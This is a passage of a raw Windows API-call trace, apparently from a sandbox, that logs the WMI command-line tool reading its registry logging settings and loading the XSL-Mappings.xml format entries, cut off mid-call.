[0290.001] malloc (_Size=0x18) returned 0x38129c0 [0290.001] malloc (_Size=0x40) returned 0x3810520 [0290.002] malloc (_Size=0x20a) returned 0x38197c8 [0290.002] GetSystemDirectoryW (in: lpBuffer=0x38197c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0290.002] free (_Block=0x38197c8) [0290.002] malloc (_Size=0xc) returned 0x3810568 [0290.002] malloc (_Size=0xc) returned 0x3810580 [0290.002] malloc (_Size=0xc) returned 0x3812d80 [0290.002] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0290.002] SysStringLen (param_1="\\wbem\\") returned 0x6 [0290.002] free (_Block=0x3810568) [0290.002] free (_Block=0x3810580) [0290.002] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0290.002] free (_Block=0x3812d80) [0290.002] malloc (_Size=0xc) returned 0x38197f0 [0290.002] malloc (_Size=0xc) returned 0x3819880 [0290.002] malloc (_Size=0xc) returned 0x38199a0 [0290.002] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0290.002] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0290.003] free (_Block=0x38197f0) [0290.003] free (_Block=0x3819880) [0290.003] GetCurrentThreadId () returned 0x11d4 [0290.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2f8f1c4 | out: phkResult=0x2f8f1c4*=0x1a0) returned 0x0 [0290.003] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2f8f1d0, lpcbData=0x2f8f1cc*=0x400 | out: lpType=0x0, lpData=0x2f8f1d0*=0x30, lpcbData=0x2f8f1cc*=0x4) returned 0x0 [0290.003] _wcsicmp (_String1="0", _String2="1") returned -1 [0290.003] _wcsicmp (_String1="0", _String2="2") returned -2 [0290.003] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2f8f1cc*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2f8f1cc*=0x42) returned 0x0 [0290.003] malloc (_Size=0x86) returned 0x3812d80 [0290.003] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3812d80, lpcbData=0x2f8f1cc*=0x42 | out: lpType=0x0, lpData=0x3812d80*=0x25, lpcbData=0x2f8f1cc*=0x42) returned 0x0 [0290.003] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0290.003] malloc (_Size=0x42) returned 0x3812e10 [0290.003] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0290.003] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2f8f1d0, lpcbData=0x2f8f1cc*=0x400 | out: lpType=0x0, lpData=0x2f8f1d0*=0x36, lpcbData=0x2f8f1cc*=0xc) returned 0x0 [0290.003] _wtol (_String="65536") returned 65536 [0290.004] free (_Block=0x3812d80) [0290.004] RegCloseKey (hKey=0x0) returned 0x6 [0290.004] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2f8f660 | out: ppv=0x2f8f660*=0x37745a8) returned 0x0 [0290.025] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x37745a8, xmlSource=0x2f8f5e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2f8f64c | out: isSuccessful=0x2f8f64c*=0xffff) returned 0x0 [0290.191] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x37745a8, DOMElement=0x2f8f65c | out: DOMElement=0x2f8f65c*=0x3776b48) returned 0x0 [0290.192] malloc (_Size=0xc) returned 0x3819988 [0290.192] IXMLDOMElement:getElementsByTagName (in: This=0x3776b48, tagName="XSLFORMAT", resultList=0x2f8f658 | out: resultList=0x2f8f658*=0x3779ca0) returned 0x0 [0290.193] free (_Block=0x3819988) [0290.193] IXMLDOMNodeList:get_length (in: This=0x3779ca0, listLength=0x2f8f654 | out: listLength=0x2f8f654*=21) returned 0x0 [0290.194] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=0, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.194] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.194] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.195] malloc (_Size=0xc) returned 0x3819988 [0290.195] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.195] free (_Block=0x3819988) [0290.195] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0290.195] malloc (_Size=0xc) returned 0x3819808 [0290.195] malloc (_Size=0xc) returned 0x3819928 [0290.195] malloc (_Size=0x18) returned 0x38129e0 [0290.195] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.195] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.196] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.196] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=1, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.196] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="textvaluelist.xsl") returned 0x0 [0290.196] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.196] malloc (_Size=0xc) returned 0x3819820 [0290.196] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.196] free (_Block=0x3819820) [0290.196] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0290.196] malloc (_Size=0xc) returned 0x38197f0 [0290.196] malloc (_Size=0xc) returned 0x3819880 [0290.196] SysStringLen (param_1="VALUE") returned 0x5 [0290.196] SysStringLen (param_1="TABLE") returned 0x5 [0290.196] SysStringLen (param_1="TABLE") returned 0x5 [0290.197] SysStringLen (param_1="VALUE") returned 0x5 [0290.197] malloc (_Size=0x18) returned 0x3812b40 [0290.197] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.197] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.197] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.197] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=2, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.197] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="textvaluelist.xsl") returned 0x0 [0290.197] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.197] malloc (_Size=0xc) returned 0x3819988 [0290.197] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.197] free (_Block=0x3819988) [0290.197] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0290.197] malloc (_Size=0xc) returned 0x3819988 [0290.198] malloc (_Size=0xc) returned 0x3819898 [0290.198] SysStringLen (param_1="LIST") returned 0x4 [0290.198] SysStringLen (param_1="TABLE") returned 0x5 [0290.198] malloc (_Size=0x18) returned 0x3812d40 [0290.198] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.198] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.198] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.198] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=3, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.198] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="rawxml.xsl") returned 0x0 [0290.198] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.198] malloc (_Size=0xc) returned 0x38198e0 [0290.198] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.198] free (_Block=0x38198e0) [0290.199] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0290.199] malloc (_Size=0xc) returned 0x3819868 [0290.199] malloc (_Size=0xc) returned 0x3819958 [0290.199] SysStringLen (param_1="RAWXML") returned 0x6 [0290.199] SysStringLen (param_1="TABLE") returned 0x5 [0290.199] SysStringLen (param_1="RAWXML") returned 0x6 [0290.199] SysStringLen (param_1="LIST") returned 0x4 [0290.199] SysStringLen (param_1="LIST") returned 0x4 [0290.199] SysStringLen (param_1="RAWXML") returned 0x6 [0290.199] malloc (_Size=0x18) returned 0x3812d00 [0290.199] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.199] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.199] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.199] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=4, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.199] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="htable.xsl") returned 0x0 [0290.199] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.199] malloc (_Size=0xc) returned 0x3819910 [0290.200] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.200] free (_Block=0x3819910) [0290.200] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0290.200] malloc (_Size=0xc) returned 0x38199b8 [0290.200] malloc (_Size=0xc) returned 0x3819820 [0290.200] SysStringLen (param_1="HTABLE") returned 0x6 [0290.200] SysStringLen (param_1="TABLE") returned 0x5 [0290.200] SysStringLen (param_1="HTABLE") returned 0x6 [0290.200] SysStringLen (param_1="LIST") returned 0x4 [0290.200] malloc (_Size=0x18) returned 0x3812be0 [0290.200] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.200] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.200] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.201] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=5, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.201] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="hform.xsl") returned 0x0 [0290.201] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.201] malloc (_Size=0xc) returned 0x3819970 [0290.201] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.201] free (_Block=0x3819970) [0290.202] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0290.202] malloc (_Size=0xc) returned 0x38198b0 [0290.202] malloc (_Size=0xc) returned 0x3819838 [0290.202] SysStringLen (param_1="HFORM") returned 0x5 [0290.202] SysStringLen (param_1="TABLE") returned 0x5 [0290.202] SysStringLen (param_1="HFORM") returned 0x5 [0290.202] SysStringLen (param_1="LIST") returned 0x4 [0290.202] SysStringLen (param_1="HFORM") returned 0x5 [0290.202] SysStringLen (param_1="HTABLE") returned 0x6 [0290.202] malloc (_Size=0x18) returned 0x3812b60 [0290.202] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.202] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.202] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.202] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=6, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.202] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="xml.xsl") returned 0x0 [0290.202] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.203] malloc (_Size=0xc) returned 0x3819910 [0290.203] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.203] free (_Block=0x3819910) [0290.203] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0290.203] malloc (_Size=0xc) returned 0x38198e0 [0290.203] malloc (_Size=0xc) returned 0x38198c8 [0290.203] SysStringLen (param_1="XML") returned 0x3 [0290.203] SysStringLen (param_1="TABLE") returned 0x5 [0290.203] SysStringLen (param_1="XML") returned 0x3 [0290.203] SysStringLen (param_1="VALUE") returned 0x5 [0290.203] SysStringLen (param_1="VALUE") returned 0x5 [0290.203] SysStringLen (param_1="XML") returned 0x3 [0290.203] malloc (_Size=0x18) returned 0x3812d60 [0290.203] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.203] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.204] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.204] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=7, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.204] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="mof.xsl") returned 0x0 [0290.204] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.204] malloc (_Size=0xc) returned 0x3819850 [0290.204] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.204] free (_Block=0x3819850) [0290.204] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0290.204] malloc (_Size=0xc) returned 0x38198f8 [0290.204] malloc (_Size=0xc) returned 0x3819850 [0290.204] SysStringLen (param_1="MOF") returned 0x3 [0290.204] SysStringLen (param_1="TABLE") returned 0x5 [0290.204] SysStringLen (param_1="MOF") returned 0x3 [0290.204] SysStringLen (param_1="LIST") returned 0x4 [0290.205] SysStringLen (param_1="MOF") returned 0x3 [0290.205] SysStringLen (param_1="RAWXML") returned 0x6 [0290.205] SysStringLen (param_1="LIST") returned 0x4 [0290.205] SysStringLen (param_1="MOF") returned 0x3 [0290.205] malloc (_Size=0x18) returned 0x3812a00 [0290.205] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.205] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.205] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.205] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=8, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.205] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="csv.xsl") returned 0x0 [0290.205] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.205] malloc (_Size=0xc) returned 0x3819910 [0290.205] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.205] free (_Block=0x3819910) [0290.206] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0290.206] malloc (_Size=0xc) returned 0x3819910 [0290.206] malloc (_Size=0xc) returned 0x3819940 [0290.206] SysStringLen (param_1="CSV") returned 0x3 [0290.206] SysStringLen (param_1="TABLE") returned 0x5 [0290.206] SysStringLen (param_1="CSV") returned 0x3 [0290.206] SysStringLen (param_1="LIST") returned 0x4 [0290.206] SysStringLen (param_1="CSV") returned 0x3 [0290.206] SysStringLen (param_1="HTABLE") returned 0x6 [0290.206] SysStringLen (param_1="CSV") returned 0x3 [0290.206] SysStringLen (param_1="HFORM") returned 0x5 [0290.206] malloc (_Size=0x18) returned 0x3812aa0 [0290.206] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.206] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.206] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.206] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=9, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.206] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.206] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.207] malloc (_Size=0xc) returned 0x3819970 [0290.207] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.207] free (_Block=0x3819970) [0290.207] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0290.207] malloc (_Size=0xc) returned 0x3819970 [0290.207] malloc (_Size=0xc) returned 0x381ab10 [0290.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.207] SysStringLen (param_1="TABLE") returned 0x5 [0290.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.207] SysStringLen (param_1="VALUE") returned 0x5 [0290.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.207] SysStringLen (param_1="XML") returned 0x3 [0290.207] SysStringLen (param_1="XML") returned 0x3 [0290.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.207] malloc (_Size=0x18) returned 0x3812a60 [0290.208] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.208] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.208] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.208] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=10, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.208] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.208] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.208] malloc (_Size=0xc) returned 0x381aca8 [0290.208] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.208] free (_Block=0x381aca8) [0290.208] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0290.208] malloc (_Size=0xc) returned 0x381ad38 [0290.208] malloc (_Size=0xc) returned 0x381aca8 [0290.208] SysStringLen (param_1="texttablewsys") returned 0xd [0290.209] SysStringLen (param_1="TABLE") returned 0x5 [0290.209] SysStringLen (param_1="texttablewsys") returned 0xd [0290.209] SysStringLen (param_1="XML") returned 0x3 [0290.209] SysStringLen (param_1="texttablewsys") returned 0xd [0290.209] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.209] SysStringLen (param_1="XML") returned 0x3 [0290.209] SysStringLen (param_1="texttablewsys") returned 0xd [0290.209] malloc (_Size=0x18) returned 0x3812ce0 [0290.209] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.209] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.209] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.209] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=11, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.209] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.209] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.209] malloc (_Size=0xc) returned 0x381abd0 [0290.209] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.210] free (_Block=0x381abd0) [0290.210] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0290.210] malloc (_Size=0xc) returned 0x381ad68 [0290.210] malloc (_Size=0xc) returned 0x381acf0 [0290.210] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.210] SysStringLen (param_1="TABLE") returned 0x5 [0290.210] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.210] SysStringLen (param_1="XML") returned 0x3 [0290.210] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.210] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.210] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.210] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.210] malloc (_Size=0x18) returned 0x3812ac0 [0290.210] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.210] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.210] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.210] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=12, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.211] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.211] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.211] malloc (_Size=0xc) returned 0x381ab28 [0290.211] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.211] free (_Block=0x381ab28) [0290.211] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0290.211] malloc (_Size=0xc) returned 0x381ad98 [0290.211] malloc (_Size=0xc) returned 0x381ab40 [0290.211] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.211] SysStringLen (param_1="TABLE") returned 0x5 [0290.211] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.211] SysStringLen (param_1="XML") returned 0x3 [0290.211] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.211] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.211] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.211] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.211] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.211] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0290.212] malloc (_Size=0x18) returned 0x3812d20 [0290.212] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.212] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.212] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.212] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=13, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.212] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.212] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.212] malloc (_Size=0xc) returned 0x381ad80 [0290.212] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: namedItem=0x2f8f66c*=0x3779ff8) returned 0x0 [0290.212] free (_Block=0x381ad80) [0290.212] IXMLDOMNode:get_nodeValue (in: This=0x3779ff8, value=0x2f8f62c | out: value=0x2f8f62c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0290.212] malloc (_Size=0xc) returned 0x381abe8 [0290.212] malloc (_Size=0xc) returned 0x381adb0 [0290.213] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.213] SysStringLen (param_1="TABLE") returned 0x5 [0290.213] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.213] SysStringLen (param_1="XML") returned 0x3 [0290.213] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.213] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0290.213] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.213] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.213] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0290.213] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0290.213] malloc (_Size=0x18) returned 0x3812a20 [0290.213] IUnknown:Release (This=0x3776b88) returned 0x0 [0290.213] IUnknown:Release (This=0x3779fa8) returned 0x0 [0290.213] IUnknown:Release (This=0x3779ff8) returned 0x0 [0290.213] IXMLDOMNodeList:get_item (in: This=0x3779ca0, index=14, listItem=0x2f8f674 | out: listItem=0x2f8f674*=0x3776b88) returned 0x0 [0290.213] IXMLDOMNode:get_text (in: This=0x3776b88, text=0x2f8f678 | out: text=0x2f8f678*="texttable.xsl") returned 0x0 [0290.213] IXMLDOMNode:get_attributes (in: This=0x3776b88, attributeMap=0x2f8f670 | out: attributeMap=0x2f8f670*=0x3779fa8) returned 0x0 [0290.213] malloc (_Size=0xc) returned 0x381adc8 [0290.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3779fa8, name="KEYWORD", namedItem=0x2f8f66c | out: 